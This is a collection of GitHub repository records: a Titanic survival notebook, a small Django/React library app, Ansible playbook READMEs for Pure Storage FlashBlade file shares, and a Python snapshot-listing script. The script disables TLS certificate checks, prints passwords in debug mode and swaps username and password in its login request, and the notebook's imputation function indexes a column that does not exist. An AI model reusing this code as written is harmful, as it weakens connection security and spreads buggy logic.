dataset\ntitanic_data.isnull().sum()\n\n\n# In[108]:\n\n\n#display in heatmap\nsns.heatmap(titanic_data.isnull(), cmap=\"viridis\")\n\n\n# In[109]:\n\n\n#if age had null\n#plot boxplot for visualization\n\nsns.boxplot(x='Pclass', y='Age', data=titanic_data)\n\n#imputation\ndef impute_age(cols):\n Age =cols[0]\n Pclass = cols[6]\n if(pd.isnull(Age)):\n if(Pclass == 1):\n return 37\n elif(Pclass == 2):\n return 29\n else:\n return 24\n else:\n return Age\n \n \ntitanic_data['Age'] = titanic_data[['Age', 'Pclass'].apply(impute_age, axis = 1)]\n\n\n# In[110]:\n\n\ntitanic_data.head(5)\n\n\n# In[111]:\n\n\n#Cabin column has too many null values, lets drop it\ntitanic_data.drop('Cabin', axis=1, inplace=True)\n\n\n# In[112]:\n\n\nsns.heatmap(titanic_data.isnull(), cmap=\"viridis\")\n\n\n# In[113]:\n\n\n#drop all na values\ntitanic_data.dropna(inplace=True)\n\n\n# In[114]:\n\n\n#check if the dataset is clean\ntitanic_data.isnull().sum()\n\n\n# In[115]:\n\n\n#set gender to be binary\nsex = pd.get_dummies(titanic_data['Sex'], drop_first = True)\n\n\n# In[116]:\n\n\n#apply get_dummies to embarked\nembark = pd.get_dummies(titanic_data['Embarked'], drop_first=True)\nembark.head(5)\n\n\n# In[117]:\n\n\npcl = pd.get_dummies(titanic_data['Pclass'], drop_first=True)\npcl.head(5)\n\n\n# In[118]:\n\n\ntitle = pd.get_dummies(titanic_data['Title'])\ntitle.head(5)\n\n\n# In[119]:\n\n\n#merge the data\ntitanic_data= pd.concat([titanic_data, sex, embark, pcl], axis= 1)\ntitanic_data.head(5)\n\n\n# In[120]:\n\n\n\ntitanic_data.head(5)\n\n\n# In[121]:\n\n\ntitanic_data.head(5)\n\n\n# In[122]:\n\n\ntitanic_data.drop(['Name', 'Ticket', 'PassengerId'], axis=1, inplace=True)\n\n\n# In[123]:\n\n\ntitanic_data.head(5)\n\n\n# In[124]:\n\n\ntitanic_data.drop('Title', axis=1, inplace=True)\n\n\n# In[125]:\n\n\ntitanic_data.head(5)\n\n\n# In[126]:\n\n\ntitanic_data.drop(['Embarked', 'Pclass', 'Sex'], axis=1, inplace=True)\n\n\n# In[127]:\n\n\ntitanic_data.head(5)\n\n\n# ## Train and Test\n\n# In[128]:\n\n\ny = titanic_data['Survived']\n\n\n# In[129]:\n\n\nX = titanic_data.drop('Survived', axis=1)\n\n\n# In[130]:\n\n\nfrom sklearn.model_selection import train_test_split\n\n\n# In[131]:\n\n\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.3, random_state=1)\n\n\n# In[132]:\n\n\nfrom sklearn.linear_model import LogisticRegression\n\n\n# In[133]:\n\n\nlogmodel = LogisticRegression()\n\n\n# In[135]:\n\n\nlogmodel.max_iter = 120000\n\n\n# In[136]:\n\n\nlogmodel.fit(X_train, y_train)\n\n\n# In[137]:\n\n\npredictions = logmodel.predict(X_test)\n\n\n# In[139]:\n\n\nfrom sklearn.metrics import classification_report\n\n\n# In[140]:\n\n\nclassification_report(y_test, predictions)\n\n\n# In[141]:\n\n\nfrom sklearn.metrics import confusion_matrix\n\n\n# In[142]:\n\n\nconfusion_matrix(y_test, predictions)\n\n\n# In[144]:\n\n\nfrom sklearn.metrics import accuracy_score\n\n\n# In[145]:\n\n\naccuracy_score(y_test, predictions)\n\n\n# In[146]:\n\n\naccuracy_score(y_test, predictions) * 100\n\n\n# In[ ]:\n\n\n\n\n"
}
] | 1 |
tomjuran/Library | https://github.com/tomjuran/Library | bccb86aa5f0752eaba57c8e8adc4be2e27f25dae | aecc0617650fbbf7fb9d851497efd00748279060 | 2bf21059934ff2cb6c5daef923e49852f2b95f76 | refs/heads/main | 2023-03-06T04:27:42.088705 | 2021-02-16T17:58:37 | 2021-02-16T17:58:37 | 339,483,343 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.7107142806053162,
"alphanum_fraction": 0.7107142806053162,
"avg_line_length": 29.33333396911621,
"blob_id": "153f88f79263795f5bc582f63b69ff12f3543a9d",
"content_id": "45b04214d439ad62a418ef22806762dfaeaa9bc3",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 280,
"license_type": "no_license",
"max_line_length": 61,
"num_lines": 9,
"path": "/urls.py",
"repo_name": "tomjuran/Library",
"src_encoding": "UTF-8",
"text": "# books-api/booksApi/books/urls.py.\r\nfrom django.urls import path\r\nfrom rest_framework.urlpatterns import format_suffix_patterns\r\nfrom books import views\r\n\r\nurlpatterns = [\r\n path('books/', views.BookList.as_view()),\r\n path('books/<int:pk>/', views.BookDetail.as_view()),\r\n]"
},
{
"alpha_fraction": 0.5815109610557556,
"alphanum_fraction": 0.5874751210212708,
"avg_line_length": 23.200000762939453,
"blob_id": "1025a7f8fabb2ce9f50a1cc5f26ff14891a17232",
"content_id": "f8a262ced4bb7d2730d80c05070d24ab3f1d1cd7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 1006,
"license_type": "no_license",
"max_line_length": 77,
"num_lines": 40,
"path": "/src/components/ToggleBookForm.js",
"repo_name": "tomjuran/Library",
"src_encoding": "UTF-8",
"text": "import React, {Component} from 'react'\r\nimport BookForm from './BookForm'\r\n\r\nclass ToggleableBookForm extends Component {\r\n state = {\r\n inCreateMode: false\r\n }\r\n handleCreateClick = () => {\r\n this.setState({inCreateMode: true});\r\n }\r\n leaveCreateMode = () => {\r\n this.setState({inCreateMode: false});\r\n }\r\n handleCancleClick = () => {\r\n this.leaveCreateMode();\r\n }\r\n handleFormSubmit = (book) => {\r\n this.leaveCreateMode();\r\n this.props.onBookCreate(book);\r\n }\r\n render() {\r\n if (this.state.inCreateMode) {\r\n return (\r\n <div className=\"mb-3 p-4\" style={{boxShadow: '0 0 10px #ccc'}} >\r\n <BookForm\r\n onFormSubmit={this.handleFormSubmit}\r\n onCancelClick={this.handleCancleClick}></BookForm>\r\n </div>\r\n\r\n )\r\n }\r\n return (\r\n <button onClick={this.handleCreateClick} className=\"btn btn-secondary\">\r\n <i className=\"fas fa-plus\">Click</i>\r\n </button>\r\n );\r\n }\r\n}\r\n\r\nexport default ToggleableBookForm"
},
{
"alpha_fraction": 0.7682619690895081,
"alphanum_fraction": 0.7682619690895081,
"avg_line_length": 28.69230842590332,
"blob_id": "b2a0bfb7b20585cdba3cee5c71d942387ed0faa1",
"content_id": "7506e302d029fa983fbb87fcdccf9162f944c318",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 397,
"license_type": "no_license",
"max_line_length": 56,
"num_lines": 13,
"path": "/views.py",
"repo_name": "tomjuran/Library",
"src_encoding": "UTF-8",
"text": "# books-api/booksApi/books/views.py.\r\n\r\nfrom .models import Book\r\nfrom .serializers import BookSerializer\r\nfrom rest_framework import generics\r\n\r\nclass BookList(generics.ListCreateAPIView):\r\n queryset = Book.objects.all()\r\n serializer_class = BookSerializer\r\n\r\nclass BookDetail(generics.RetrieveUpdateDestroyAPIView):\r\n queryset = Book.objects.all()\r\n serializer_class = BookSerializer"
}
] | 3 |
keshavattrey/ansible-playbook-examples | https://github.com/keshavattrey/ansible-playbook-examples | 42a2cbabb7fde56429e245fee3ae8e4a45e3a2ca | 2eaa5e563c4e86a300ebf4ea83967b243289f03d | f07dd9a9734a072bfc9c89c766dc66ec154e7bae | refs/heads/master | 2022-12-18T20:45:26.406412 | 2020-09-22T11:17:11 | 2020-09-22T11:17:11 | 297,573,029 | 1 | 0 | Apache-2.0 | 2020-09-22T07:41:18 | 2020-09-20T21:05:56 | 2020-09-20T21:05:53 | null | [
{
"alpha_fraction": 0.6448656320571899,
"alphanum_fraction": 0.651739239692688,
"avg_line_length": 33.5467643737793,
"blob_id": "67f7e710dcad7f785fefc1aecd3fae85c3e4a011",
"content_id": "caabfc73090a0f53a18e6424911b8d5d89e173e4",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 4803,
"license_type": "permissive",
"max_line_length": 383,
"num_lines": 139,
"path": "/flashblade/pure-fb-smb-filesystem-map/README.md",
"repo_name": "keshavattrey/ansible-playbook-examples",
"src_encoding": "UTF-8",
"text": "FlashBlade SMB FileSystem mapping on Windows clients \n=========\n\nAnsible playbook and role for FlashBlade SMB File System mapping on Windows clients.\n\n\nRequirements\n------------\n**Requires: Python >=2.7, <=3.6 on Ansible control node.**\n\nAs purity-fb SDK supports Python >=2.7, <=3.6, We need to ensure that Installed Python version on Ansible control Node must be >=2.7 and <=3.6.\n\n* Install python-pip on Ansible control node.\n\n CentOS:\n ```bash\n $ sudo yum install epel-release\n $ sudo yum install python-pip\n $ sudo pip install --upgrade pip\n ```\n Ubuntu:\n ```bash\n $ sudo apt install python-pip\n $ sudo pip install --upgrade pip\n ```\n MacOS\n ```bash\n $ curl https://bootstrap.pypa.io/get-pip.py -o get-pip.py\n $ python get-pip.py --user\n ```\n For more details to install Ansible on MacOS, follow this [link](https://docs.ansible.com/ansible/latest/installation_guide/intro_installation.html#installing-ansible-with-pip).\n \n* Install dependencies from \"requirements.txt\"\n ```bash\n $ sudo pip install -r requirements.txt \n ```\n* Install Ansible Collection for Pure Storage FlashBlade\n ```bash\n $ ansible-galaxy collection install purestorage.flashblade\n ```\n\nWindows host setup\n------------------\n\nTo setup windows host for Ansible, refer to the Ansible [documentation](https://docs.ansible.com/ansible/latest/user_guide/windows_setup.html).\n\nFor this playbook we assumes that the `CredSSP` authentication protocol enabled on host/client. \n\nRole Variables\n--------------\n\nThere are two variable files \"fb_details.yml\" and \"fb_secrets.yml\" are holding the Ansible variables for the role at path `vars/<enviorement_name>`. \n\nThis role and playbook can be used to setup SMB File System on FlashBlade servers and mount on clients in different environments. To store role variable files user can create different directories with `vars/<environment_name>`. User must specify `<environment_name>` while running `ansible-playbook` by specifying value in extra vars command line flag `-e \"env=<environment_name>\"`.\n\nAnsible playbooks require API token to connect to FlashBlade servers. API token can be obtained by connecting FlashBlade management VIP through ssh for a specific user and running the following purity command.\n ```\n $ ssh <pureuser>@<pure_fb_mgmt_ip>\n $ pureadmin list <username> --api-token -–expose\n ```\nUpdate \"api_token\" obtained from FlashBlade in \"fb_secrets.yml\" file and \"fb_url\" value with FlashBlade Management VIP in \"fb_details.yml\" \n\nEncrypt \"fb_secrets.yml\" using Ansible-Vault and enter password when prompted. This password is required to run playbook.\n```\n$ ansible-vault encrypt fb_secrets.yml\n```\n\nUpdate variables in `fb_details.yml` and `fb_secrets.yml` files to the desired values.\n\n* fb_details.yml\n ```\n ############################ FB array object-store provisioning #############################\n array_inventory: \n FBServer1:\n fb_url: 10.222.22.60 \n filesystem:\n - { name: winbackup, size: 32G, type: smb, smb_aclmode: native } \n\n ######################## Mount/Unmount Filesystem on client/host ########################\n windows_client_mount:\n mount1:\n server: { fb_name: FBServer1, fileshare: winbackup, data_vip: NFS-1 } \n client: { hosts: win, mount_state: mapped, drive_letter: Z } \n ```\n Note: To unmap the fileshare, use `mount_state: unmapped` in \"fb_details.yml\" file.\n\n* fb_secrets.yml\n ```\n array_secrets: \n FBServer1:\n token: T-154d4220-xxxx-xxxx-8d64-fe7ea4f93499\n ```\n* hosts.ini \n ```\n [win]\n windows-host1 ansible_host=10.xx.xxx.96\n\n [win:vars]\n ansible_user=<DOMAIN>\\<user_name>\n ansible_connection=winrm\n ansible_winrm_transport=credssp\n ansible_winrm_server_cert_validation=ignore\n ```\n\n\nDependencies\n------------\n\nNone\n\nExample Playbook\n----------------\n\n - name: FlashBlade filesystem setup\n hosts: localhost\n vars_files:\n - \"vars/{{ env }}/fb_details.yml\"\n - \"vars/{{ env }}/fb_secrets.yml\"\n roles:\n - purefb_filesystem_setup\n\n - name: Mount SMB file share on windows hosts\n hosts: win\n gather_facts: false\n vars_files:\n - \"vars/{{ env }}/fb_details.yml\"\n - \"vars/{{ env }}/fb_secrets.yml\"\n roles:\n - purefb_smb_map\n\n\nTo execute playbook, issue the following command:\n( Replace `<enviorement_name>` and `<client_pass> `with the correct value )\n ```bash\n $ ansible-playbook filesystem_smb_map.yml -e \"env=<enviorement_name> ansible_password=<client_pass>\" --ask-vault-pass\n ```\nEnter Ansible-Vault password when prompted.\n\n**Note:** To see the mapped drive on interactive session, user need to reboot the system."
},
{
"alpha_fraction": 0.7828282713890076,
"alphanum_fraction": 0.8333333134651184,
"avg_line_length": 23.75,
"blob_id": "37a8082081246adee2044723dba1f174d2f6db09",
"content_id": "13ea0aa72d31af3f4b38ec1867aad796ac1f7dc7",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "INI",
"length_bytes": 198,
"license_type": "permissive",
"max_line_length": 43,
"num_lines": 8,
"path": "/flashblade/pure-fb-smb-filesystem-map/hosts.ini",
"repo_name": "keshavattrey/ansible-playbook-examples",
"src_encoding": "UTF-8",
"text": "[win]\nwindows-host1 ansible_host=10.21.152.96\n\n[win:vars]\nansible_user=PUREANSIBLE\\Administrator\nansible_connection=winrm\nansible_winrm_transport=credssp\nansible_winrm_server_cert_validation=ignore\n"
},
{
"alpha_fraction": 0.6811594367027283,
"alphanum_fraction": 0.7681159377098083,
"avg_line_length": 10.666666984558105,
"blob_id": "cb82713459524485b56b211e251fc7c2abb8eea2",
"content_id": "bd0d10faed7c7ec1f51f7f2d0d855096c1efcc7c",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 69,
"license_type": "permissive",
"max_line_length": 16,
"num_lines": 6,
"path": "/flashblade/pure-fb-smb-filesystem-map/requirements.txt",
"repo_name": "keshavattrey/ansible-playbook-examples",
"src_encoding": "UTF-8",
"text": "ansible\npurity-fb==1.9.1\nnetaddr\npytz\npywinrm>=0.3.0\npywinrm[credssp]"
},
{
"alpha_fraction": 0.6506205201148987,
"alphanum_fraction": 0.6602106094360352,
"avg_line_length": 37.81752014160156,
"blob_id": "15d00b74aa8ece2714b5fdfa26a0a4b57b51bdf2",
"content_id": "46e23ec90ab8ef1cc8e71626dc39be0b49cb956d",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 5320,
"license_type": "permissive",
"max_line_length": 379,
"num_lines": 137,
"path": "/flashblade/pure-fb-filesystem-mount/Readme.md",
"repo_name": "keshavattrey/ansible-playbook-examples",
"src_encoding": "UTF-8",
"text": "FlashBlade NFS File System mount\n=========\n\nAnsible playbook and role for FlashBlade NFS File System mount on clients.\n\n\nRequirements\n------------\n\n**Requires: Python >=2.7, <=3.6 on Ansible control node.**\n\nAs purity-fb SDK supports Python >=2.7, <=3.6, We need to ensure that Installed Python version on Ansible control Node must be >=2.7 and <=3.6.\n\n* Install python-pip on Ansible control node.\n\n CentOS:\n ```bash\n $ sudo yum install epel-release\n $ sudo yum install python-pip\n $ sudo pip install --upgrade pip\n ```\n Ubuntu:\n ```bash\n $ sudo apt install python-pip\n $ sudo pip install --upgrade pip\n ```\n MacOS\n ```bash\n $ curl https://bootstrap.pypa.io/get-pip.py -o get-pip.py\n $ python get-pip.py --user\n ```\n For more details to install Ansible on MacOS, follow this [link](https://docs.ansible.com/ansible/latest/installation_guide/intro_installation.html#installing-ansible-with-pip).\n\n* Install dependencies from \"requirements.txt\"\n ```bash\n $ sudo pip install -r requirements.txt\n ```\n* Install Ansible Collection for Pure Storage FlashBlade\n ```bash\n $ ansible-galaxy collection install purestorage.flashblade\n ```\n\nRole Variables\n--------------\n\nThere are two variable files \"fb_details.yml\" and \"fb_secrets.yml\" are holding the Ansible variables for the role at path `vars/<enviorement_name>`. \n\nThis role and playbook can be used to setup File System on FlashBlade servers and mount on clients in different environments. To store role variable files user can create different directories with `vars/<environment_name>`. User must specify `<environment_name>` while running `ansible-playbook` by specifying value in extra vars command line flag `-e \"env=<environment_name>\"`.\n\nAnsible playbooks require API token to connect to FlashBlade servers. API token can be obtained by connecting FlashBlade management VIP through ssh for a specific user and running the following purity command.\n ```\n $ ssh <pureuser>@<pure_fb_mgmt_ip>\n $ pureadmin list <username> --api-token -–expose\n ```\nUpdate \"api_token\" obtained from FlashBlade in \"fb_secrets.yml\" file and \"fb_url\" value with FlashBlade Management VIP in \"fb_details.yml\".\n\nEncrypt \"fb_secrets.yml\" using Ansible-Vault and enter password when prompted. This password is required to run playbook.\n```\n$ ansible-vault encrypt fb_secrets.yml\n```\n\nUpdate variables in `fb_details.yml` and `fb_secrets.yml` files to the desired values.\n\n* fb_details.yml\n ```\n array_inventory: \n FBServer1:\n fb_url: 10.22.222.80 \n filesystem:\n - { name: tools, size: 1T, type: nfsv4.1, nfs_rules: '*(ro,noatime)' } \n - { name: scratch, size: 1T, type: nfsv3, nfs_rules: '*(ro,noatime)' } \n - { name: database, size: 1T, type: nfsv3, nfs_rules: '*(rw,noatime)' }\n\n linux_client_mount:\n mount1:\n server: { fb_name: FBServer1, fileshare: tools, data_vip: data-vip } \n client: { hosts: dc, mount_state: mount, mount_point: /mnt/tools, opts: \"rw,noatime\" }\n mount2:\n server: { fb_name: FBServer1, fileshare: scratch, data_vip: nfs-a04-data1 } \n client: { hosts: dc, mount_state: mount, mount_point: /mnt/scratch, opts: \"rw\" }\n mount3:\n server: { fb_name: FBServer1, fileshare: database, data_vip: nfs-a04-data1 }\n client: { hosts: dc, mount_state: mount, mount_point: /mnt/database, opts: \"rw\" }\n \n ```\n\n* fb_secrets.yml\n ```\n array_secrets: \n FBServer1:\n api_token: T-79ced0e5-xxxx-xxxx-8741-66482f04c6d1\n FBServer2:\n api_token: T-0b8ad89c-xxxx-xxxx-85ed-286607dc2cd2 \n ```\nNote: To unmount FIleSystem, User can change `mount_state: umount` variable in fb_details.yml file.\n\nDependencies\n------------\n\nNone\n\nExample Playbook\n----------------\n\n - name: FlashBlade filesystem setup\n hosts: localhost\n gather_facts: false\n vars_files:\n - \"vars/{{ env }}/fb_details.yml\"\n - \"vars/{{ env }}/fb_secrets.yml\"\n roles:\n - purefb_filesystem_setup\n\n - name: Mount file share on hosts\n hosts: all\n gather_facts: true\n vars_files:\n - \"vars/{{ env }}/fb_details.yml\"\n - \"vars/{{ env }}/fb_secrets.yml\"\n roles:\n - purefb_nfs_mount\n\nTo execute playbook with host ssh key, issue the following command:\n( Replace `<ssh_user>` with host ssh user name and `<key_file_path>` with host private key file path )\n ```bash\n $ ansible-playbook filesystem_mount.yml -e \"env=<enviorement_name>\" -i hosts.ini --user=<ssh_user> --key-file=<key_file_path> --ask-vault-pass \n ```\n\nTo execute playbook with host password( Not Recommended ), issue the following command:\n( Replace `<enviorement_name>` with the correct value )\n ```bash\n $ ansible-playbook filesystem_mount.yml -e \"env=<enviorement_name>\" -i hosts.ini --ask-vault-pass --ask-pass --ask-become-pass\n ```\nEnter Ansible-Vault password, hosts/clients ssh password and root password.\n\n**Note:** If you are using MacOS as Ansible control node and using password to connect to remote hosts, SSH connection with password not supported.\nThe workaround for this limitation is to pass `-c paramiko` flag in ansible-playbook command. Install paramiko using `pip install paramiko`.\n"
},
{
"alpha_fraction": 0.5404070019721985,
"alphanum_fraction": 0.5491279363632202,
"avg_line_length": 29.26392936706543,
"blob_id": "2a72133bf42a5cc754015d1ea8fb3ace2e38f00c",
"content_id": "2745560b44d17117247f6687cd5040b593df04b1",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 10320,
"license_type": "permissive",
"max_line_length": 121,
"num_lines": 341,
"path": "/oracle-database/files/monitor_PGrep.py",
"repo_name": "keshavattrey/ansible-playbook-examples",
"src_encoding": "UTF-8",
"text": "import requests\nfrom requests.packages.urllib3.exceptions import InsecureRequestWarning\nrequests.packages.urllib3.disable_warnings(InsecureRequestWarning)\nfrom base64 import b64encode\nimport os\nimport sys\nimport json\nimport getpass\nfrom optparse import OptionParser\nfrom datetime import datetime, timedelta\nimport time\nfrom time import gmtime, strftime, strptime\nfrom operator import itemgetter, attrgetter\n\n# Global Variables\nVERSION = '1.0.0'\nHEADER = 'Pure Storage List Protection Group Snapshot Replication (' + VERSION + ')'\nBANNER = ('=' * 132)\nDEBUG_LEVEL = 0\nVERBOSE_FLAG = False\nQUITE_FLAG = False \n\nCOOKIE = ''\n\ndef create_session(flashArray, user, password, api_token):\n global COOKIE\n\n # Set-up HTTP header\n userAgent = 'Jakarta Commons-HttpClient/3.1'\n hdrs= {'Content-Type' : 'application/json', 'User-agent' : userAgent, 'Cookie' : COOKIE}\n \n #Establish Session, if no token provide need to create an API token first\n \n if user:\n data = {\n 'password': user,\n 'username': password\n }\n params = json.dumps(data)\n path = '/api/1.12/auth/apitoken'\n url = 'https://%s%s'%(flashArray,path)\n \n # Perform action\n response = requests.post(url, params, headers=hdrs, verify=False)\n\n COOKIE = response.cookies\n \n if DEBUG_LEVEL == 2:\n print('Status', response.status_code)\n print('Reason', response.reason)\n print('Text', response.text)\n print('Data', response.json)\n print('HTTP Header:', response.headers)\n print('Cookie', COOKIE)\n print('')\n \n if (response.reason) != 'OK':\n print(BANNER)\n sys.exit('Exiting: invalid username / password combination')\n \n jsonString = response.text\n jsonData = json.loads(jsonString)\n \n api_token = (jsonData['api_token'])\n\n data = {\n 'api_token': api_token\n }\n \n params = json.dumps(data)\n path = '/api/1.12/auth/session'\n url = 'https://%s%s'%(flashArray,path)\n\n # Perform action\n if not QUITE_FLAG:\n print('Attempting to create session')\n\n response = requests.post(url, params, headers=hdrs, verify=False)\n\n COOKIE = response.cookies\n\n if DEBUG_LEVEL == 2:\n print('Status', response.status_code)\n print('Reason', response.reason)\n print('Text', response.text)\n print('Data', response.json)\n print('HTTP Header:', response.headers)\n print('Cookie', COOKIE)\n print('')\n\n if (response.reason) != 'OK':\n print(BANNER)\n sys.exit('Exiting: Unable to establish session')\n\n jsonString = response.text\n jsonData = json.loads(jsonString)\n\n if not QUITE_FLAG and VERBOSE_FLAG:\n print(json.dumps(jsonData, sort_keys=False, indent=4))\n\n name = (jsonData['username'])\n welcome = 'Welcome ' + name\n\n if not QUITE_FLAG:\n print(welcome)\n\n\ndef post_url(flashArray,path,params):\n # Set-up HTTP header\n userAgent = 'Jakarta Commons-HttpClient/3.1'\n hdrs= {'Content-Type' : 'application/json', 'User-agent' : userAgent}\n url = 'https://%s%s'%(flashArray,path)\n \n # Perform action\n response = requests.post(url, params, headers=hdrs, cookie=COOKIE, verify=False)\n \n if DEBUG_LEVEL != 0:\n print('Response Status:', response.status_code)\n print('Reason:', response.reason)\n print('Text', response.text)\n print('Data', response.json)\n print('HTTP Header:', response.headers)\n print('Cookie', COOKIE)\n print('')\n \n jsonString = response.text\n jsonData = json.loads(jsonString)\n return(jsonData)\n\n\ndef get_url(flashArray,path,params):\n # Set-up HTTP header\n userAgent = 'Jakarta Commons-HttpClient/3.1'\n hdrs= {'Content-Type' : 'application/json', 'User-agent' : userAgent}\n url = 'https://%s%s'%(flashArray,path)\n payload = params\n\n # Perform action\n response = requests.get(url, headers=hdrs, cookies=COOKIE, verify=False)\n \n if DEBUG_LEVEL != 0:\n print('Response Status:', response.status_code)\n print('Reason:', response.reason)\n print('Text', response.text)\n print('Data', response.json)\n print('HTTP Header:', response.headers)\n print('Cookie:', COOKIE)\n \n jsonString = response.text\n jsonData = json.loads(jsonString)\n return(jsonData)\n\n\ndef list_pgsnaps(flashArray,pgroup,limit):\n data = ''\n params = json.dumps(data)\n \n if pgroup != '':\n path = '/api/1.12/pgroup?names=%s&snap=true&transfer=true&sort=created-&limit=%s'%(pgroup,limit)\n else:\n path = '/api/1.12/pgroup?snap=true&transfer=true&sort=created-&limit=%s'%(limit)\n\n # Perform action\n jsonData = get_url(flashArray,path,params)\n\n r = str(jsonData)\n\n if (r[3:15]) == 'pure_err_key':\n pure_err_code = jsonData[0]['pure_err_code']\n msg = 'Exiting: ' + pgroup + ' ' + jsonData[0]['msg']\n print(BANNER)\n\n sys.exit(msg)\n\n if VERBOSE_FLAG:\n print(json.dumps(jsonData, sort_keys=False, indent=4))\n\n # Count of returned rows\n res = len(jsonData)\n\n if res == 0:\n print('No Snaps found')\n else:\n x = 0\n \n if not QUITE_FLAG:\n print(BANNER)\n print('{0:40} {1:60} {2:20} {3:10}'.format('Source', 'Snap Name', 'Created', 'Progress'))\n print(BANNER)\n\n while (x<res):\n #\n source = (jsonData[x]['source'])\n name = (jsonData[x]['name'])\n progress = (jsonData[x]['progress'])\n physical = (jsonData[x]['physical_bytes_written'])\n cdate = (jsonData[x]['created'])\n c1 = cdate[0:10]\n c2 = cdate[11:19]\n c3 = c1 + ' ' + c2\n\n c4 = strptime(c3,'%Y-%m-%d %H:%M:%S')\n created = strftime('%d/%m/%Y %H:%M:%S', c4)\n \n if not QUITE_FLAG:\n print('{0:40} {1:60} {2:20} {3:10}'.format(source, name, created, progress))\n \n x = x + 1\n\ndef parsecl():\n usage = 'usage: %prog [options]'\n version = '%prog ' + VERSION\n description = \"This program returns Snapshots for given Protection Group. Please contact [email protected] for any assistance.\"\n\n parser = OptionParser(usage=usage, version=version, description=description)\n\n parser.add_option('-d', '--debug',\n type = 'int',\n dest = 'DEBUG_LEVEL',\n default = 0,\n help = 'Debug level, used for HTTP debugging')\n \n parser.add_option('-l', '--limit',\n type = 'int',\n dest = 'limit',\n default = 999,\n help = 'Limit number of responses [default: %default]')\n \n parser.add_option('-p', '--password',\n action = 'store',\n type = 'string',\n dest = 'password',\n help = 'Pure password')\n \n parser.add_option('-q', '--quite',\n action = 'store_true',\n dest = 'QUITE_FLAG',\n default = False,\n help = 'Quite [default: %default]')\n \n parser.add_option('-P', '--pgroup',\n action = 'store',\n type = 'string',\n dest = 'pgroup',\n default = '',\n help = 'Protection Group')\n \n parser.add_option('-s', '--server',\n action = 'store',\n type = 'string',\n dest = 'flashArray',\n help = 'Pure FlashArray')\n \n parser.add_option('-t', '--token',\n action = 'store',\n type = 'string',\n dest = 'api_token',\n help = 'Pure Api Token')\n\n parser.add_option('-u', '--user',\n action = 'store',\n type = 'string',\n dest = 'user',\n help = 'Pure user name')\n\n parser.add_option('-v', '--verbose',\n action = 'store_true',\n dest = 'VERBOSE_FLAG',\n default = False,\n help = 'Verbose [default: %default]')\n\n (options, args) = parser.parse_args()\n\n '''\n print(\"Options:\", options)\n print(\"Args:\", args)\n '''\n\n if options.api_token and options.user:\n parser.error('options --token and --user are mutually exclusive')\n \n return(options)\n\ndef main():\n # Setup variables\n global DEBUG_LEVEL\n global VERBOSE_FLAG\n global QUITE_FLAG\n exit_code = 0\n\n # Check for command line parameters\n options = parsecl()\n password = options.password\n user = options.user\n flashArray = options.flashArray\n limit = options.limit\n pgroup = options.pgroup\n api_token = options.api_token\n DEBUG_LEVEL = options.DEBUG_LEVEL\n VERBOSE_FLAG = options.VERBOSE_FLAG\n QUITE_FLAG = options.QUITE_FLAG\n \n if DEBUG_LEVEL != 0:\n print('Password', password)\n print('User', user)\n print('Flash Array', flashArray)\n print('Protection Group', pgroup)\n print('Limit', limit)\n print('Api Token', api_token)\n print('Debug Level:', DEBUG_LEVEL)\n print('Verbose Flag:', VERBOSE_FLAG)\n print('Quite Flag:', QUITE_FLAG)\n\n if flashArray == None:\n sys.exit('Exiting: You must provide FlashArray details')\n\n if api_token == None and user == None:\n sys.exit('Exiting: You must provide either API Token details or username and password')\n\n if user and password == None:\n sys.exit('Exiting: You must provide password if using username')\n\n if not QUITE_FLAG:\n print(BANNER)\n print(HEADER + ' - ' + flashArray)\n print(strftime('%d/%m/%Y %H:%M:%S %Z', gmtime()))\n print(BANNER)\n\n # Create session\n create_session(flashArray, user, password, api_token)\n\n list_pgsnaps(flashArray,pgroup,limit)\n \n if not QUITE_FLAG:\n print(BANNER)\n print(strftime('%d/%m/%Y %H:%M:%S %Z', gmtime()))\n print(BANNER)\n\n sys.exit(exit_code)\n\nmain()\n"
},
{
"alpha_fraction": 0.7987805008888245,
"alphanum_fraction": 0.8353658318519592,
"avg_line_length": 40,
"blob_id": "0e62d89e735d7ae49fca733ab4b4d6eec2712079",
"content_id": "803f901dae1e319e191d130bb9ea514d4a0176ab",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "INI",
"length_bytes": 164,
"license_type": "permissive",
"max_line_length": 52,
"num_lines": 4,
"path": "/flashblade/pure-fb-filesystem-mount/hosts.ini",
"repo_name": "keshavattrey/ansible-playbook-examples",
"src_encoding": "UTF-8",
"text": "[dc]\nhost1 ansible_host=ansible-host1 ansible_user=centos\nhost2 ansible_host=ansible-host2 ansible_user=centos\nhost3 ansible_host=ansible-host3 ansible_user=centos\n"
},
{
"alpha_fraction": 0.6611570119857788,
"alphanum_fraction": 0.7933884263038635,
"avg_line_length": 39.33333206176758,
"blob_id": "40545e3021e4725687e20f2eddc3486debae0385",
"content_id": "85b5bac937e506ce50556dfba3dbe178cbdaa4c7",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "INI",
"length_bytes": 121,
"license_type": "permissive",
"max_line_length": 57,
"num_lines": 3,
"path": "/flashblade/pure-fb-filesystem-replication/hosts.ini",
"repo_name": "keshavattrey/ansible-playbook-examples",
"src_encoding": "UTF-8",
"text": "[dc]\ninit47d-v46 ansible_host=10.xx.xxx.86 ansible_user=centos\ninit47d-v47 ansible_host=10.xx.xxx.87 ansible_user=centos\n"
},
{
"alpha_fraction": 0.7368420958518982,
"alphanum_fraction": 0.8070175647735596,
"avg_line_length": 7.285714149475098,
"blob_id": "11d43f19a54f555f825e40e2ac1e0e6dbce1da1a",
"content_id": "58fb654c6c39a83bb47c9898ed267a4d6e6dd047",
"detected_licenses": [
"Apache-2.0"
